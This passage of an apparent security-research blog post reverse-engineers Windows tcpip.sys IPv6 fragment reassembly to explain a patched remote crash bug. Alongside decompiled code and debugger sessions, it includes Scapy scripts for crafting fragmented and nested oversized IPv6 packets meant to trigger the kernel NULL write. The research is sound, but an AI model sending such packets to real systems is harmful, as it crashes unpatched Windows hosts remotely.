All right, perfect. We have now what I consider a good enough research environment and we can start digging deep into the code. At this point, let's not focus on the vulnerability yet but instead try to understand how the code works, the type of arguments it receives, recover structures and the semantics of important fields, etc. Let's get our HexRays decompilation output pretty.

As you might imagine, this is the part that's the most time consuming. I use a mixture of bottom-up, top-down. Loads of experiments. Commenting the decompiled code as best as I can, challenging myself by asking questions, answering them, rinse & repeat.

High level overview

Oftentimes, studying code / features in isolation in complex systems is not enough; it only takes you so far. Complex drivers like tcpip.sys are gigantic, carry a lot of state, and are hard to reason about, both in terms of execution and data flow. In this case, there is this sort of size integer, that seems to be related to something that got received and we want to set that to 0xffff. Unfortunately, just focusing on Ipv6pReassembleDatagram and Ipv6pReceiveFragment was not enough for me to make significant progress. It was worth a try though but time to switch gears.

Zooming out

All right, that's cool, our HexRays decompiled code is getting prettier and prettier; it feels rewarding. We have abused the create new structure feature to lift a bunch of structures. We guessed about the semantics of some of them but most are still unknown. So yeah, let's work smarter.

We know that tcpip.sys receives packets from the network; we don't know exactly how or where from but maybe we don't need to know that much. One of the first questions you might ask yourself is how the kernel stores network data? What structures does it use?

NET_BUFFER & NET_BUFFER_LIST

If you have some Windows kernel experience, you might be familiar with NDIS and you might also have heard about some of the APIs and the structures it exposes to users. It is documented because third-parties can develop extensions and drivers to interact with the network stack at various points.

An important structure in this world is NET_BUFFER. This is what it looks like in WinDbg:

kd> dt NDIS!_NET_BUFFER
NDIS!_NET_BUFFER
   +0x000 Next             : Ptr64 _NET_BUFFER
   +0x008 CurrentMdl       : Ptr64 _MDL
   +0x010 CurrentMdlOffset : Uint4B
   +0x018 DataLength       : Uint4B
   +0x018 stDataLength     : Uint8B
   +0x020 MdlChain         : Ptr64 _MDL
   +0x028 DataOffset       : Uint4B
   +0x000 Link             : _SLIST_HEADER
   +0x000 NetBufferHeader  : _NET_BUFFER_HEADER
   +0x030 ChecksumBias     : Uint2B
   +0x032 Reserved         : Uint2B
   +0x038 NdisPoolHandle   : Ptr64 Void
   +0x040 NdisReserved     : [2] Ptr64 Void
   +0x050 ProtocolReserved : [6] Ptr64 Void
   +0x080 MiniportReserved : [4] Ptr64 Void
   +0x0a0 DataPhysicalAddress : _LARGE_INTEGER
   +0x0a8 SharedMemoryInfo : Ptr64 _NET_BUFFER_SHARED_MEMORY
   +0x0a8 ScatterGatherList : Ptr64 _SCATTER_GATHER_LIST

It can look overwhelming but we don't need to understand every detail. What is important is that the network data are stored in a regular MDL. As MDLs, NET_BUFFER can be chained together which allows the kernel to store a large amount of data in a bunch of non-contiguous chunks of physical memory; virtual memory is the magic wand used to make the data look contiguous. For the readers that are not familiar with Windows kernel development, an MDL is a Windows kernel construct that allows users to map physical memory in a contiguous virtual memory region. Every MDL is actually followed by a list of PFNs (which don't need to be contiguous) that the Windows kernel is able to map in a contiguous virtual memory region; magic.

kd> dt nt!_MDL
   +0x000 Next             : Ptr64 _MDL
   +0x008 Size             : Int2B
   +0x00a MdlFlags         : Int2B
   +0x00c AllocationProcessorNumber : Uint2B
   +0x00e Reserved         : Uint2B
   +0x010 Process          : Ptr64 _EPROCESS
   +0x018 MappedSystemVa   : Ptr64 Void
   +0x020 StartVa          : Ptr64 Void
   +0x028 ByteCount        : Uint4B
   +0x02c ByteOffset       : Uint4B

NET_BUFFER_LIST are basically a structure to keep track of a list of NET_BUFFERs as the name suggests:

kd> dt NDIS!_NET_BUFFER_LIST
   +0x000 Next             : Ptr64 _NET_BUFFER_LIST
   +0x008 FirstNetBuffer   : Ptr64 _NET_BUFFER
   +0x000 Link             : _SLIST_HEADER
   +0x000 NetBufferListHeader : _NET_BUFFER_LIST_HEADER
   +0x010 Context          : Ptr64 _NET_BUFFER_LIST_CONTEXT
   +0x018 ParentNetBufferList : Ptr64 _NET_BUFFER_LIST
   +0x020 NdisPoolHandle   : Ptr64 Void
   +0x030 NdisReserved     : [2] Ptr64 Void
   +0x040 ProtocolReserved : [4] Ptr64 Void
   +0x060 MiniportReserved : [2] Ptr64 Void
   +0x070 Scratch          : Ptr64 Void
   +0x078 SourceHandle     : Ptr64 Void
   +0x080 NblFlags         : Uint4B
   +0x084 ChildRefCount    : Int4B
   +0x088 Flags            : Uint4B
   +0x08c Status           : Int4B
   +0x08c NdisReserved2    : Uint4B
   +0x090 NetBufferListInfo : [29] Ptr64 Void

Again, no need to understand every detail, thinking in concepts is good enough. On top of that, Microsoft makes our life easier by providing a very useful WinDbg extension called ndiskd. It exposes two functions to dump NET_BUFFER and NET_BUFFER_LIST: !ndiskd.nb and !ndiskd.nbl respectively. These are a big time saver because they'll take care of walking the various levels of indirection: list of NET_BUFFERs and chains of MDLs.

The mechanics of parsing an IPv6 packet

Now that we know where and how network data is stored, we can ask ourselves how IPv6 packet parsing works? I have very little knowledge about networking, but I know that there are various headers that need to be parsed differently and that they can chain together. The layer N tells you what you'll find next.

What I am about to describe is what I have figured out while reverse-engineering as well as what I have observed during debugging it through a bazillions of experiments. Full disclosure: I am no expert so take it with a grain of salt :)

The top level function of interest is IppReceiveHeaderBatch. The first thing it does is to invoke IppReceiveHeadersHelper on every packet that are in the list:

if ( Packet )
{
    do
    {
        Next = Packet->Next;
        Packet->Next = 0;
        IppReceiveHeadersHelper(Packet, Protocol, ...);
        Packet = Next;
    }
    while ( Next );
}

Packet_t is an undocumented structure that is associated with received packets. A bunch of state is stored in this structure and figuring out the semantics of important fields is time consuming. IppReceiveHeadersHelper's main role is to kick off the parsing machine. It parses the IPv6 (or IPv4) header of the packet and reads the next_header field. As I mentioned above, this field is very important because it indicates how to read the next layer of the packet. This value is kept in the Packet structure, and a bunch of functions reads and updates it during parsing.

NetBufferList = Packet->NetBufferList;
HeaderSize = Protocol->HeaderSize;
FirstNetBuffer = NetBufferList->FirstNetBuffer;
CurrentMdl = FirstNetBuffer->CurrentMdl;
if ( (CurrentMdl->MdlFlags & 5) != 0 )
    Va = CurrentMdl->MappedSystemVa;
else
    Va = MmMapLockedPagesSpecifyCache(CurrentMdl, 0, MmCached, 0, 0, 0x40000000u);
IpHdr = (ipv6_header_t *)((char *)Va + FirstNetBuffer->CurrentMdlOffset);
if ( Protocol == (Protocol_t *)Ipv4Global )
{
    // ...
}
else
{
    Packet->NextHeader = IpHdr->next_header;
    Packet->NextHeaderPosition = offsetof(ipv6_header_t, next_header);
    SrcAddrOffset = offsetof(ipv6_header_t, src);
}

The function does a lot more; it initializes several Packet_t fields but let's ignore that for now to avoid getting overwhelmed by complexity. Once the function returns back in IppReceiveHeaderBatch, it extracts a demuxer off the Protocol_t structure and invokes a parsing callback if the NextHeader is a valid extension header. The Protocol_t structure holds an array of Demuxer_t (term used in the driver).

struct Demuxer_t
{
  void (__fastcall *Parse)(Packet_t *);
  void *f0;
  void *f1;
  void *Size;
  void *f3;
  _BYTE IsExtensionHeader;
  _BYTE gap[23];
};

struct Protocol_t
{
  // ...
  Demuxer_t Demuxers[277];
};

NextHeader (populated earlier in IppReceiveHeaderBatch) is the value used to index into this array.

ida43

If the demuxer is handling an extension header, then a callback is invoked to parse the header properly. This happens in a loop until the parsing hits the first part of the packet that isn't a header in which case it handles the next packet.

while ( ... )
{
    NetBufferList = RcvList->NetBufferList;
    IpProto = RcvList->NextHeader;
    if ( ... )
    {
        Demuxer = (Demuxer_t *)IpUdpEspDemux;
    }
    else
    {
        Demuxer = &Protocol->Demuxers[IpProto];
    }
    if ( !Demuxer->IsExtensionHeader )
        Demuxer = 0;
    if ( Demuxer )
        Demuxer->Parse(RcvList);
    else
        RcvList = RcvList->Next;
}

Makes sense - that's kinda how we would implement parsing of IPv6 packets as well right?

ida1

It is easy to dump the demuxers and their associated NextHeader / Parse values; these might come handy later.

- nh = 0  -> Ipv6pReceiveHopByHopOptions
- nh = 43 -> Ipv6pReceiveRoutingHeader
- nh = 44 -> Ipv6pReceiveFragmentList
- nh = 60 -> Ipv6pReceiveDestinationOptions

Demuxer can expose a callback routine for parsing which I called Parse. The Parse method receives a Packet and it is free to update its state; for example to grab the NextHeader that is needed to know how to parse the next layer. This is what Ipv6pReceiveFragmentList looks like (Ipv6FragmentDemux.Parse):

ida1

It makes sure the next header is IPPROTO_FRAGMENT before going further. Again, makes sense.

The mechanics of IPv6 fragmentation

Now that we understand the overall flow a bit more, it is a good time to start thinking about fragmentation. We know we need to send fragmented packets to hit the code that was fixed by the update, which we know is important somehow. The function that parses fragments is Ipv6pReceiveFragment and it is hairy. Again, keeping track of fragments probably warrants that, so nothing unexpected here.

It's also the right time for us to read literature about how exactly IPv6 fragmentation works. Concepts have been useful until now, but at this point we need to understand the nitty-gritty details. I don't want to spend too much time on this as there is tons of content online discussing the subject so I'll just give you the fast version. To define a fragment, you need to add a fragmentation header which is called IPv6ExtHdrFragment in Scapy land:

class IPv6ExtHdrFragment(_IPv6ExtHdr):
    name = "IPv6 Extension Header - Fragmentation header"
    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
                   BitField("res1", 0, 8),
                   BitField("offset", 0, 13),
                   BitField("res2", 0, 2),
                   BitField("m", 0, 1),
                   IntField("id", None)]
    overload_fields = {IPv6: {"nh": 44}}

The most important fields for us are :

  • offset which tells the start offset of where the data that follows this header should be placed in the reassembled packet
  • the m bit that specifies whether or not this is the latest fragment.

Note that the offset field is an amount of 8 bytes blocks; if you set it to 1, it means that your data will be at +8 bytes. If you set it to 2, they'll be at +16 bytes, etc.

Here is a small ghetto IPv6 fragmentation function I wrote to ensure I was understanding things properly. I enjoy learning through practice. (Scapy has fragment6):

def frag6(target, frag_id, bytes, nh, frag_size = 1008):
    '''Ghetto fragmentation.'''
    assert (frag_size % 8) == 0
    leftover = bytes
    offset = 0
    frags = []
    while len(leftover) > 0:
        chunk = leftover[: frag_size]
        leftover = leftover[len(chunk): ]
        last_pkt = len(leftover) == 0
        # 0 -> No more / 1 -> More
        m = 0 if last_pkt else 1
        assert offset < 8191
        pkt = Ether() \
            / IPv6(dst = target) \
            / IPv6ExtHdrFragment(m = m, nh = nh, id = frag_id, offset = offset) \
            / chunk

        offset += (len(chunk) // 8)
        frags.append(pkt)
    return frags

Easy enough. The other important aspect of fragmentation in the literature is related to IPv6 headers and what is called the unfragmentable part of a packet. Here is how Microsoft describes the unfragmentable part: "This part consists of the IPv6 header, the Hop-by-Hop Options header, the Destination Options header for intermediate destinations, and the Routing header". It also is the part that precedes the fragmentation header. Obviously, if there is an unfragmentable part, there is a fragmentable part. Easy, the fragmentable part is what you are sending behind the fragmentation header. The reassembly process is the process of stitching together the unfragmentable part with the reassembled fragmentable part into one beautiful reassembled packet. Here is a diagram taken from Understanding the IPv6 Header that sums it up pretty well:

msftpress

All of this theoretical information is very useful because we can now look for those details while we reverse-engineer. It is always easier to read code and try to match it against what it is supposed or expected to do.

Theory vs practice: Ipv6pReceiveFragment

At this point, I felt I had accumulated enough new information and it was time for zooming back in into the target. We want to verify that reality works like the literature says it does and by doing we will improve our overall understanding. After studying this code for a while we start to understand the big lines. The function receives a Packet but as this structure is packet specific it is not enough to track the state required to reassemble a packet. This is why another important structure is used for that; I called it Reassembly.

The overall flow is basically broken up in three main parts; again no need for us to understand every single details, let's just understand it conceptually and what/how it tries to achieve its goals:

  • 1 - Figure out if the received fragment is part of an already existing Reassembly. According to the literature, we know that network stacks should use the source address, the destination address as well as the fragmentation header's identifier to determine if the current packet is part of a group of fragments. In practice, the function IppReassemblyHashKey hashes those fields together and the resulting hash is used to index into a hash-table that stores Reassembly structures (Ipv6pFragmentLookup):
int IppReassemblyHashKey(__int64 Iface, int Identification, __int64 Pkt)
{
  //...
  Protocol = *(_QWORD *)(Iface + 40);
  OffsetSrcIp = 12i64;
  AddressLength = *(unsigned __int16 *)(*(_QWORD *)(Protocol + 16) + 6i64);
  if ( Protocol != Ipv4Global )
    OffsetSrcIp = offsetof(ipv6_header_t, src);
  H = RtlCompute37Hash(
        g_37HashSeed,
        Pkt + OffsetSrcIp,
        AddressLength);
  OffsetDstIp = 16i64;
  if ( Protocol != Ipv4Global )
    OffsetDstIp = offsetof(ipv6_header_t, dst);
  H2 = RtlCompute37Hash(H, Pkt + OffsetDstIp, AddressLength);
  return RtlCompute37Hash(H2, &Identification, 4i64) | 0x80000000;
}

Reassembly_t* Ipv6pFragmentLookup(__int64 Iface, int Identification, ipv6_header_t *Pkt, KIRQL *OldIrql)
{
  // ...
  v5 = *(_QWORD *)Iface;
  Context.Signature = 0;
  HashKey = IppReassemblyHashKey(v5, Identification, (__int64)Pkt);
  *OldIrql = KeAcquireSpinLockRaiseToDpc(&Ipp6ReassemblyHashTableLock);
  *(_OWORD *)&Context.ChainHead = 0;
  for ( CurrentReassembly = (Reassembly_t *)RtlLookupEntryHashTable(&Ipp6ReassemblyHashTable, HashKey, &Context);
        ;
        CurrentReassembly = (Reassembly_t *)RtlGetNextEntryHashTable(&Ipp6ReassemblyHashTable, &Context) )
  {
    // If we have walked through all the entries in the hash-table,
    // then we can just bail.
    if ( !CurrentReassembly )
      return 0;
    // If the current entry matches our iface, pkt id, ip src/dst
    // then we found a match!
    if ( CurrentReassembly->Iface == Iface
      && CurrentReassembly->Identification == Identification
      && memcmp(&CurrentReassembly->Ipv6.src.u.Byte[0], &Pkt->src.u.Byte[0], 16) == 0
      && memcmp(&CurrentReassembly->Ipv6.dst.u.Byte[0], &Pkt->dst.u.Byte[0], 16) == 0 )
    {
      break;
    }
  }
  // ...
  return CurrentReassembly;
}
  • 1.1 - If the fragment doesn't belong to any known group, it needs to be put in a newly created Reassembly. This is what IppCreateInReassemblySet does. It's worth noting that this is a point of interest for a reverse-engineer because this is where the Reassembly object gets allocated and constructed (in IppCreateReassembly). It means we can retrieve its size as well as some more information about some of the fields.
Reassembly_t *IppCreateInReassemblySet(
    PKSPIN_LOCK SpinLock, void *Src, __int64 Iface, __int64 Identification, KIRQL NewIrql
)
{
  Reassembly_t *Reassembly = IppCreateReassembly(Src, Iface, Identification);
  if ( Reassembly )
  {
    IppInsertReassembly((__int64)SpinLock, Reassembly);
    KeAcquireSpinLockAtDpcLevel(&Reassembly->Lock);
    KeReleaseSpinLockFromDpcLevel(SpinLock);
  }
  else
  {
    KeReleaseSpinLock(SpinLock, NewIrql);
  }
  return Reassembly;
}

ida3
  • 2 - Now that we have a Reassembly structure, the main function wants to figure out where the current fragment fits in the overall reassembled packet. The Reassembly keeps track of fragments using various lists. It uses a ContiguousList that chains fragments that will be contiguous in the reassembled packet. IppReassemblyFindLocation is the function that seems to implement the logic to figure out where the current fragment fits.

  • 2.1 - If IppReassemblyFindLocation returns a pointer to the start of the ContiguousList, it means that the current packet is the first fragment. This is where the function extracts and keeps track of the unfragmentable part of the packet. It is kept in a pool buffer that is referenced in the Reassembly structure.

if ( ReassemblyLocation == &Reassembly->ContiguousStartList )
{
  Reassembly->NextHeader = Fragment->nexthdr;
  UnfragmentableLength = LOWORD(Packet->NetworkLayerHeaderSize) - 48;
  Reassembly->UnfragmentableLength = UnfragmentableLength;
  if ( UnfragmentableLength )
  {
    UnfragmentableData = ExAllocatePoolWithTagPriority(
      (POOL_TYPE)512,
      UnfragmentableLength,
      'erPI',
      LowPoolPriority
    );
    Reassembly->UnfragmentableData = UnfragmentableData;
    if ( !UnfragmentableData )
    {
      // ...
      goto Bail_0;
    }
    // ...
    // Copy the unfragmentable part of the packet inside the pool
    // buffer that we have allocated.
    RtlCopyMdlToBuffer(
      FirstNetBuffer->MdlChain,
      FirstNetBuffer->DataOffset - Packet->NetworkLayerHeaderSize + 0x28,
      Reassembly->UnfragmentableData,
      Reassembly->UnfragmentableLength,
      v51);
    NextHeaderOffset = Packet->NextHeaderPosition;
  }
  Reassembly->NextHeaderOffset = NextHeaderOffset;
  *(_QWORD *)&Reassembly->Ipv6 = *(_QWORD *)Packet->Ipv6Hdr;
}
  • 3 - The fragment is then added into the Reassembly as part of a group of fragments by IppReassemblyInsertFragment. On top of that, if we have received every fragment necessary to start a reassembly, the function Ipv6pReassembleDatagram is invoked. Remember this guy? This is the function that has been patched and that we hit earlier in the post. But this time, we understand how we got there.

At this stage we have an OK understanding of the data structures involved to keep track of groups of fragments and how/when reassembly gets kicked off. We've also commented and refined various structure fields that we lifted early in the process; this is very helpful because now we can understand the fix for the vulnerability:

void Ipv6pReassembleDatagram(Packet_t *Packet, Reassembly_t *Reassembly, char OldIrql)
{
  //...
  UnfragmentableLength = Reassembly->UnfragmentableLength;
  TotalLength = UnfragmentableLength + Reassembly->DataLength;
  HeaderAndOptionsLength = UnfragmentableLength + sizeof(ipv6_header_t);
  // Below is the added code by the patch
  if ( TotalLength > 0xFFF ) {
      // Bail
  }

How cool is that? That's really rewarding. Putting in a bunch of work that may feel not that useful at the time, but eventually adds up, snow-balls and really moves the needle forward. It's just a slow process and you gotta get used to it; that's just how the sausage is made.

Let's not get ahead of ourselves though, the emotional rollercoaster is right around the corner :)

Hiding in plain sight

All right - at this point I think we are done with zooming out and understanding the big picture. We understand the beast well enough to start getting back on this BSoD. After reading Ipv6pReassembleDatagram a few times I honestly couldn't figure out where the advertised crash could happen. Pretty frustrating. That is why I decided instead to use the debugger to modify Reassembly->DataLength and UnfragmentableLength at runtime to see if this could give me any hints. The first one didn't seem to do anything, but the second one bug-checked the machine with a NULL dereference, bingo that is looking good!

After carefully analyzing the crash I've started to realize that the potential issue has been hiding in plain sight in front of my eyes; here is the code:

void Ipv6pReassembleDatagram(Packet_t *Packet, Reassembly_t *Reassembly, char OldIrql)
{
  // ...
  const uint32_t UnfragmentableLength = Reassembly->UnfragmentableLength;
  const uint32_t TotalLength = UnfragmentableLength + Reassembly->DataLength;
  const uint32_t HeaderAndOptionsLength = UnfragmentableLength + sizeof(ipv6_header_t);
  // …
  NetBufferList = (_NET_BUFFER_LIST *)NetioAllocateAndReferenceNetBufferAndNetBufferList(
                                        IppReassemblyNetBufferListsComplete,
                                        Reassembly,
                                        0i64,
                                        0i64,
                                        0,
                                        0);
  if ( !NetBufferList )
  {
    // ...
    goto Bail_0;
  }

  FirstNetBuffer = NetBufferList->FirstNetBuffer;
  if ( NetioRetreatNetBuffer(FirstNetBuffer, uint16_t(HeaderAndOptionsLength), 0) < 0 )
  {
    // ...
    goto Bail_1;
  }

  Buffer = (ipv6_header_t *)NdisGetDataBuffer(FirstNetBuffer, HeaderAndOptionsLength, 0i64, 1u, 0);
  //...
  *Buffer = Reassembly->Ipv6;

NetioAllocateAndReferenceNetBufferAndNetBufferList allocates a brand new NBL called NetBufferList. Then NetioRetreatNetBuffer is called:

NDIS_STATUS NetioRetreatNetBuffer(_NET_BUFFER *Nb, ULONG Amount, ULONG DataBackFill)
{
  const uint32_t CurrentMdlOffset = Nb->CurrentMdlOffset;
  if ( CurrentMdlOffset < Amount )
    return NdisRetreatNetBufferDataStart(Nb, Amount, DataBackFill, NetioAllocateMdl);
  Nb->DataOffset -= Amount;
  Nb->DataLength += Amount;
  Nb->CurrentMdlOffset = CurrentMdlOffset - Amount;
  return 0;
}

Because the FirstNetBuffer just got allocated, it is empty and most of its fields are zero. This means that NetioRetreatNetBuffer triggers a call to NdisRetreatNetBufferDataStart which is publicly documented. According to the documentation, it should allocate an MDL using NetioAllocateMdl as the network buffer is empty as we mentioned above. One thing to notice is that the amount of bytes, HeaderAndOptionsLength, passed to NetioRetreatNetBuffer is truncated to a uint16_t; odd.

  if ( NetioRetreatNetBuffer(FirstNetBuffer, uint16_t(HeaderAndOptionsLength), 0) < 0 )

Now that there is backing space in the NB for the IPv6 header as well as the unfragmentable part of the packet, it needs to get a pointer to the backing data in order to populate the buffer. NdisGetDataBuffer is documented as to gain access to a contiguous block of data from a NET_BUFFER structure. After reading the documentation several time, it was a little bit confusing to me so I figured I'd throw NDIS in IDA and have a look at the implementation:

PVOID NdisGetDataBuffer(PNET_BUFFER NetBuffer, ULONG BytesNeeded, PVOID Storage, UINT AlignMultiple, UINT AlignOffset)
{
  const _MDL *CurrentMdl = NetBuffer->CurrentMdl;
  if ( !BytesNeeded || !CurrentMdl || NetBuffer->DataLength < BytesNeeded )
    return 0i64;
// ...

Just looking at the beginning of the implementation something stands out. As NdisGetDataBuffer is called with HeaderAndOptionsLength (not truncated), we should be able to hit the following condition NetBuffer->DataLength < BytesNeeded when HeaderAndOptionsLength is larger than 0xffff. Why, you ask? Let's take an example. HeaderAndOptionsLength is 0x1337, so NetioRetreatNetBuffer allocates a backing buffer of 0x1337 bytes, and NdisGetDataBuffer returns a pointer to the newly allocated data; works as expected. Now let's imagine that HeaderAndOptionsLength is 0x31337. This means that NetioRetreatNetBuffer allocates 0x1337 (because of the truncation) bytes but calls NdisGetDataBuffer with 0x31337 which makes the call fail because the network buffer is not big enough and we hit this condition NetBuffer->DataLength < BytesNeeded.

As the returned pointer is trusted not to be NULL, Ipv6pReassembleDatagram carries on by using it for a memory write:

  *Buffer = Reassembly->Ipv6;

This is where it should bugcheck. As usual we can verify our understanding of the function with a WinDbg session. Here is a simple Python script that sends two fragments:

from scapy.all import *
id = 0xdeadbeef
first = Ether() \
    / IPv6(dst = 'ff02::1') \
    / IPv6ExtHdrFragment(id = id, m = 1, offset = 0) \
    / UDP(sport = 0x1122, dport = 0x3344) \
    / '---frag1'
second = Ether() \
    / IPv6(dst = 'ff02::1') \
    / IPv6ExtHdrFragment(id = id, m = 0, offset = 2) \
    / '---frag2'
sendp([first, second], iface='eth1')

Let's see what the reassembly looks like when those packets are received:

kd> bp tcpip!Ipv6pReassembleDatagram

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff800`117cdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

kd> p
tcpip!Ipv6pReassembleDatagram+0x5:
fffff800`117cdd71 48894c2408      mov     qword ptr [rsp+8],rcx

// ...

kd> 
tcpip!Ipv6pReassembleDatagram+0x9c:
fffff800`117cde08 48ff1569660700  call    qword ptr [tcpip!_imp_NetioAllocateAndReferenceNetBufferAndNetBufferList (fffff800`11844478)]

kd> 
tcpip!Ipv6pReassembleDatagram+0xa3:
fffff800`117cde0f 0f1f440000      nop     dword ptr [rax+rax]

kd> r @rax
rax=ffffc107f7be1d90 <- this is the allocated NBL

kd> !ndiskd.nbl @rax
    NBL                ffffc107f7be1d90    Next NBL           NULL
    First NB           ffffc107f7be1f10    Source             NULL
                                           Pool               ffffc107f58ba980 - NETIO
    Flags              NBL_ALLOCATED

    Walk the NBL chain                     Dump data payload
    Show out-of-band information           Display as Wireshark hex dump


; The first NB is empty; its length is 0 as expected

kd> !ndiskd.nb ffffc107f7be1f10
    NB                 ffffc107f7be1f10    Next NB            NULL
    Length             0                   Source pool        ffffc107f58ba980
    First MDL          0                   DataOffset         0
    Current MDL        [NULL]              Current MDL offset 0

    View associated NBL

// ...

kd> r @rcx, @rdx
rcx=ffffc107f7be1f10 rdx=0000000000000028 <- the first NB and the size to allocate for it

kd>
tcpip!Ipv6pReassembleDatagram+0xd9:
fffff800`117cde45 e80a35ecff      call    tcpip!NetioRetreatNetBuffer (fffff800`11691354)

kd> p
tcpip!Ipv6pReassembleDatagram+0xde:
fffff800`117cde4a 85c0            test    eax,eax

; The first NB now has 0x28 bytes backing MDL

kd> !ndiskd.nb ffffc107f7be1f10
    NB                 ffffc107f7be1f10    Next NB            NULL
    Length             0n40                Source pool        ffffc107f58ba980
    First MDL          ffffc107f5ee8040    DataOffset         0n56
    Current MDL        [First MDL]         Current MDL offset 0n56

    View associated NBL

// ...

; Getting access to the backing buffer

kd> 
tcpip!Ipv6pReassembleDatagram+0xfe:
fffff800`117cde6a 48ff1507630700  call    qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff800`11844178)]

kd> p
tcpip!Ipv6pReassembleDatagram+0x105:
fffff800`117cde71 0f1f440000      nop     dword ptr [rax+rax]

; This is the backing buffer; it has leftover data, but gets initialized later

kd> db @rax
ffffc107`f5ee80b0  05 02 00 00 01 00 8f 00-41 dc 00 00 00 01 04 00  ........A.......

All right, so it sounds like we have a plan - let's get to work.

Manufacturing a packet of the death: chasing phantoms

Well... sending a packet with a large header should be trivial right? That's initially what I thought. After trying various things to achieve this goal, I quickly realized it wouldn't be that easy. The main issue is the MTU. Basically, network devices don't allow you to send packets bigger than like ~1200 bytes. Online content suggests that some ethernet cards and network switches allow you to bump this limit. Because I was running my test in my own Hyper-V lab, I figured it was fair enough to try to reproduce the NULL dereference with non-default parameters, so I looked for a way to increase the MTU on the virtual switch to 64k.

The issue with that is that Hyper-V didn't allow me to do that. The only parameter I found allowed me to bump the limit to about 9k which is very far from the 64k I needed to trigger this issue. At this point, I felt frustrated because I felt I was so close to the end, but no cigar. Even though I had read that this vulnerability could be thrown over the internet, I kept going in this wrong direction. If it could be thrown from the internet, it meant it had to go through regular network equipment and there was no way a 64k packet would work. But I ignored this hard truth for a bit of time.

Eventually, I accepted the fact that I was probably heading the wrong direction, ugh. So I reevaluated my options. I figured that the bugcheck I triggered above was not the one that I would be able to trigger with packets thrown from the Internet. Maybe though there might be another code-path having a very similar pattern (retreat + NdisGetDataBuffer) that would result in a bugcheck. I've noticed that the TotalLength field is also truncated a bit further down in the function and written in the IPv6 header of the packet. This header is eventually copied in the final reassembled IPv6 header:

// The ROR2 is basically htons.
// One weird thing here is that TotalLength is truncated to 16b.
// We are able to make TotalLength >= 0x10000 by crafting a large
// packet via fragmentation.
// The issue with that is that, the size from the IPv6 header is smaller than
// the real total size. It's kinda hard to see how this would cause subsequent
// issue but hmm, yeah.
Reassembly->Ipv6.length = __ROR2__(TotalLength, 8);
// B00m, Buffer can be NULL here because of the issue discussed above.
// This copies the saved IPv6 header from the first fragment into the
// first part of the reassembled packet.
*Buffer = Reassembly->Ipv6;

My theory was that there might be some code that would read this Ipv6.length (which is truncated as __ROR2__ expects a uint16_t) and something bad might happen as a result. Although, the length would end up having a smaller value than the actual real size of the packet; it was hard for me to come up with a scenario where this would cause an issue but I still chased this theory as this was the only thing I had.

What I started to do at this point is to audit every demuxer that we saw earlier. I looked for ones that would use this length field somehow and looked for similar retreat / NdisGetDataBuffer patterns. Nothing. Thinking I might be missing something statically so I also heavily used WinDbg to verify my work. I used hardware breakpoints to track access to those two bytes but no hit. Ever. Frustrating.

After trying and trying I started to think that I might have been headed in the wrong direction again. Maybe, I really need to find a way to send such a large packet without violating the MTU. But how?

Manufacturing a packet of the death: leap of faith

All right so I decided to start fresh again. Going back to the big picture, I've studied a bit more the reassembly algorithm, diffed again just in case I missed a clue somewhere, but nothing...

Could I maybe be able to fragment a packet that has a very large header and trick the stack into reassembling the reassembled packet? We've seen previously that we could use reassembly as a primitive to stitch fragments together; so instead of trying to send a very large fragment maybe we could break down a large one into smaller ones and have them stitched together in memory. It honestly felt like a long leap forward, but based on my reverse-engineering effort I didn't really see anything that would prevent that. The idea was blurry but felt like it was worth a shot. How would it really work though?

Sitting down for a minute, this is the theory that I came up with. I created a very large fragment that has many headers; enough to trigger the bug assuming I could trigger another reassembly. Then, I fragmented this fragment so that it can be sent to the target without violating the MTU.

reassembled_pkt = IPv6ExtHdrDestOpt(options = [
        PadN(optdata=('a'*0xff)),
        PadN(optdata=('b'*0xff)),
        PadN(optdata=('c'*0xff)),
        PadN(optdata=('d'*0xff)),
        PadN(optdata=('e'*0xff)),
        PadN(optdata=('f'*0xff)),
        PadN(optdata=('0'*0xff)),
    ]) \
    # ....
    / IPv6ExtHdrDestOpt(options = [
        PadN(optdata=('a'*0xff)),
        PadN(optdata=('b'*0xa0)),
    ]) \
    / IPv6ExtHdrFragment(
        id = second_pkt_id, m = 1,
        nh = 17, offset = 0
    ) \
    / UDP(dport = 31337, sport = 31337, chksum=0x7e7f)

reassembled_pkt = bytes(reassembled_pkt)
frags = frag6(args.target, frag_id, reassembled_pkt, 60)

The reassembly happens and tcpip.sys builds this huge reassembled fragment in memory; that's great as I didn't think it would work. Here is what it looks like in WinDbg:

kd> bp tcpip+01ADF71 ".echo Reassembled NB; r @r14;"

kd> g
Reassembled NB
r14=ffff800fa2a46f10
tcpip!Ipv6pReassembleDatagram+0x205:
fffff801`0a7cdf71 41394618        cmp     dword ptr [r14+18h],eax

kd> !ndiskd.nb @r14
    NB                 ffff800fa2a46f10    Next NB            NULL
    Length                10020            Source pool        ffff800fa06ba240
    First MDL          ffff800fa0eb1180    DataOffset         0n56
    Current MDL        [First MDL]         Current MDL offset 0n56

    View associated NBL

kd> !ndiskd.nbl ffff800fa2a46d90
    NBL                ffff800fa2a46d90    Next NBL           NULL
    First NB           ffff800fa2a46f10    Source             NULL
                                           Pool               ffff800fa06ba240 - NETIO
    Flags              NBL_ALLOCATED

    Walk the NBL chain                     Dump data payload
    Show out-of-band information           Display as Wireshark hex dump

kd> !ndiskd.nbl ffff800fa2a46d90 -data
NET_BUFFER ffff800fa2a46f10
  MDL ffff800fa0eb1180
    ffff800fa0eb11f0  60 00 00 00 ff f8 3c 40-fe 80 00 00 00 00 00 00  `·····<@········
    ffff800fa0eb1200  02 15 5d ff fe e4 30 0e-ff 02 00 00 00 00 00 00  ··]···0·········
    ffff800fa0eb1210  00 00 00 00 00 00 00 01                          ········

  ...

  MDL ffff800f9ff5e8b0
    ffff800f9ff5e8f0  3c e1 01 ff 61 61 61 61-61 61 61 61 61 61 61 61  <···aaaaaaaaaaaa
    ffff800f9ff5e900  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e910  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e920  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e930  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
